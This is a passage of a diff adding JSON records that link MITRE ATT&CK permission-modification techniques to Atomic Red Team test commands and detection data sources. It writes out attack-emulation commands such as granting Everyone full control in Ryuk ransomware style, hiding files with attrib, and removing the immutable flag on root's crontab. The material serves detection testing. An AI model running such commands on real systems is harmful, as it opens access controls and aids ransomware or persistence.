PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-darkhydrus-uses-phishery-harvest-credentials-middle-east/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1222.001", + "command_list": [ + "takeown.exe /f %temp%\\T1222.001_takeown_folder /r\n", + "icacls.exe %temp%\\T1222.001_cacls /grant #{user_or_group}:F\n", + "icacls.exe #{file_or_folder} /grant Everyone:F\n", + "attrib.exe -r %temp%\\T1222.001_attrib\\*.* /s\n", + "mkdir %temp%\\T1222.001_attrib_2 >nul 2>&1\necho T1222.001_attrib1 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\n", + "icacls \"C:\\Users\\Public\\*\" /grant Everyone:F /T /C /Q", + "icacls \"#{path}\" /grant Everyone:F /T /C /Q" + ], + "commands": [ + { + "command": "takeown.exe /f %temp%\\T1222.001_takeown_folder /r\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls.exe %temp%\\T1222.001_cacls /grant #{user_or_group}:F\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls.exe #{file_or_folder} /grant Everyone:F\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "attrib.exe -r %temp%\\T1222.001_attrib\\*.* /s\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "mkdir %temp%\\T1222.001_attrib_2 >nul 2>&1\necho T1222.001_attrib1 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib1.txt\nattrib.exe +h %temp%\\T1222.001_attrib_2\\T1222.001_attrib2.txt\n", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls \"C:\\Users\\Public\\*\" /grant Everyone:F /T /C /Q", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + }, + { + "command": "icacls \"#{path}\" /grant Everyone:F /T /C /Q", + "source": "atomics/T1222.001/T1222.001.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Windows File and Directory Permissions Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1222.001", + "display_name": "File and Directory Permissions Modification: Windows File and Directory Permissions Modification", + "atomic_tests": [ + { + "name": "Take ownership using takeown utility", + "auto_generated_guid": "98d34bb4-6e75-42ad-9c41-1dae7dc6a001", + "description": "Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, \"SUCCESS\" will\nbe displayed for the folder and each file inside of it.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_folder_to_own": { + "description": "Path of the file or folder for takeown to take ownership.", + "type": "Path", + "default": "%temp%\\T1222.001_takeown_folder" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requrires a file to take ownership of to be located at (#{file_folder_to_own})\n", + "prereq_command": "IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{file_folder_to_own}\necho T1222.001_takeown1 >> #{file_folder_to_own}\\T1222.001_takeown1.txt\necho T1222.001_takeown2 >> #{file_folder_to_own}\\T1222.001_takeown2.txt\n" + } + ], + "executor": { + "command": "takeown.exe /f #{file_folder_to_own} /r\n", + "name": "command_prompt" + } + }, + { + "name": "cacls - Grant permission to specified user or group recursively", + "auto_generated_guid": "a8206bcc-f282-40a9-a389-05d9c0263485", + "description": "Modifies the filesystem permissions of the specified folder and contents to allow the specified user or group Full Control. If \"Access is denied\"\nis displayed it may be because the file or folder doesn't exit. Run the prereq command to create it. Upon successfull execution, \"Successfully processed 3 files\"\nwill be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_or_folder": { + "description": "Path of the file or folder to change permissions.", + "type": "Path", + "default": "%temp%\\T1222.001_cacls" + }, + "user_or_group": { + "description": "User or group to allow full control", + "type": "String", + "default": "Everyone" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requrires a file to modify to be located at (#{file_or_folder})\n", + "prereq_command": "IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{file_or_folder}\necho T1222.001_cacls1 >> #{file_or_folder}\\T1222.001_cacls1.txt\necho T1222.001_cacls2 >> #{file_or_folder}\\T1222.001_cacls2.txt\n" + } + ], + "executor": { + "command": "icacls.exe #{file_or_folder} /grant #{user_or_group}:F\n", + "name": "command_prompt" + } + }, + { + "name": "attrib - Remove read-only attribute", + "auto_generated_guid": "bec1e95c-83aa-492e-ab77-60c71bbd21b0", + "description": "Removes the read-only attribute from a file or folder using the attrib.exe command. Upon execution, no output will be displayed.\nOpen the file in File Explorer > Right Click - Prperties and observe that the Read Only checkbox is empty.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_or_folder": { + "description": "Path of the file or folder remove attribute.", + "type": "Path", + "default": "%temp%\\T1222.001_attrib" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requrires a file to modify to be located at (#{file_or_folder})\n", + "prereq_command": "IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{file_or_folder}\necho T1222.001_attrib1 >> #{file_or_folder}\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> #{file_or_folder}\\T1222.001_attrib2.txt\nattrib.exe +r #{file_or_folder}\\T1222.001_attrib1.txt\nattrib.exe +r #{file_or_folder}\\T1222.001_attrib2.txt\n" + } + ], + "executor": { + "command": "attrib.exe -r #{file_or_folder}\\*.* /s\n", + "name": "command_prompt" + } + }, + { + "name": "attrib - hide file", + "auto_generated_guid": "32b979da-7b68-42c9-9a99-0e39900fc36c", + "description": "Attackers leverage an existing Windows binary, attrib.exe, to mark specific files or folder as hidden by using specific flags so that\nthe victim does not see the file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_or_folder": { + "description": "Path of the files to hide.", + "type": "Path", + "default": "%temp%\\T1222.001_attrib_2" + } + }, + "executor": { + "command": "mkdir #{file_or_folder} >nul 2>&1\necho T1222.001_attrib1 >> #{file_or_folder}\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> #{file_or_folder}\\T1222.001_attrib2.txt\nattrib.exe +h #{file_or_folder}\\T1222.001_attrib1.txt\nattrib.exe +h #{file_or_folder}\\T1222.001_attrib2.txt\n", + "cleanup_command": "del /A:H #{file_or_folder}\\T1222.001_attrib*.txt >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Grant Full Access to folder for Everyone - Ryuk Ransomware Style", + "auto_generated_guid": "ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6", + "description": "Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\\ drive for Everyone.\n**icacls \"C:\\*\" /grant Everyone:F /T /C /Q**\nHowever, for this atomic we set the permission on C:\\Users\\Public so it completes faster and doesn't irreversibly affect the host.\nYou can set your own path variable to \"C:\\*\" if you prefer.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path": { + "description": "Path of folder to recursively set permissions on", + "type": "Path", + "default": "C:\\Users\\Public\\*" + }, + "file_path": { + "description": "Path of folder permission back", + "type": "Path", + "default": "%temp%\\T1222.001-folder-perms-backup.txt" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Backup of original folder permissions should exist (for use in cleanup commands)\n", + "prereq_command": "IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "icacls #{path} /save #{file_path} /t /q >nul 2>&1\n" + } + ], + "executor": { + "command": "icacls \"#{path}\" /grant Everyone:F /T /C /Q", + "cleanup_command": "icacls '#{path}' /restore #{file_path} /q >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1222.002", + "command_list": [ + null, + "chmod #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chmod a+w #{file_or_folder}\n", + "chmod #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chmod -R #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chmod -R a+w #{file_or_folder}\n", + "chmod -R #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chown root:#{group} #{file_or_folder}\n", + "chown #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "chown #{owner}:root #{file_or_folder}\n", + "chown -R root:#{group} #{file_or_folder}\n", + "chown -R #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chown -R #{owner}:root #{file_or_folder}\n", + "chown root #{file_or_folder}\n", + "chown #{owner} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "chown -R root #{file_or_folder}\n", + "chown -R #{owner} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chattr -i /var/spool/cron/root\n" + ], + "commands": [ + { + "command": null, + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod a+w #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod -R #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod -R a+w #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod -R #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown root:#{group} #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown #{owner}:root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R root:#{group} #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R #{owner}:root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown #{owner} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R #{owner} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chattr -i /var/spool/cron/root\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1222.002", + "display_name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "atomic_tests": [ + { + "name": "chmod - Change file or folder mode (numeric mode)", + "auto_generated_guid": "34ca1464-de9d-40c6-8c77-690adf36a135", + "description": "Changes a file or folder's permissions using chmod and a specified numeric mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "numeric_mode": { + "description": "Specified numeric mode value", + "type": "Integer", + "default": 755 + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod #{numeric_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chmod - Change file or folder mode (symbolic mode)", + "auto_generated_guid": "fc9d6695-d022-4a80-91b1-381f5c35aff3", + "description": "Changes a file or folder's permissions using chmod and a specified symbolic mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "symbolic_mode": { + "description": "Specified symbolic mode value", + "type": "String", + "default": "a+w" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod #{symbolic_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chmod - Change file or folder mode (numeric mode) recursively", + "auto_generated_guid": "ea79f937-4a4d-4348-ace6-9916aec453a4", + "description": "Changes a file or folder's permissions recursively using chmod and a specified numeric mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "numeric_mode": { + "description": "Specified numeric mode value", + "type": "Integer", + "default": 755 + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod -R #{numeric_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chmod - Change file or folder mode (symbolic mode) recursively", + "auto_generated_guid": "0451125c-b5f6-488f-993b-5a32b09f7d8f", + "description": "Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "symbolic_mode": { + "description": "Specified symbolic mode value", + "type": "String", + "default": "a+w" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod -R #{symbolic_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chown - Change file or folder ownership and group", + "auto_generated_guid": "d169e71b-85f9-44ec-8343-27093ff3dfc0", + "description": "Changes a file or folder's ownership and group information using chown.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" + }, + "group": { + "description": "Group name of desired group", + "type": "String", + "default": "root" + } + }, + "executor": { + "command": "chown #{owner}:#{group} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chown - Change file or folder ownership and group recursively", + "auto_generated_guid": "b78598be-ff39-448f-a463-adbf2a5b7848", + "description": "Changes a file or folder's ownership and group information recursively using chown.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + }, + "group": { + "description": "Group name of desired group", + "type": "String", + "default": "root" + } + }, + "executor": { + "command": "chown -R #{owner}:#{group} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chown - Change file or folder mode ownership only", + "auto_generated_guid": "967ba79d-f184-4e0e-8d09-6362b3162e99", + "description": "Changes a file or folder's ownership only using chown.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" + } + }, + "executor": { + "command": "chown #{owner} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chown - Change file or folder ownership recursively", + "auto_generated_guid": "3b015515-b3d8-44e9-b8cd-6fa84faf30b2", + "description": "Changes a file or folder's ownership only recursively using chown.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chown -R #{owner} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chattr - Remove 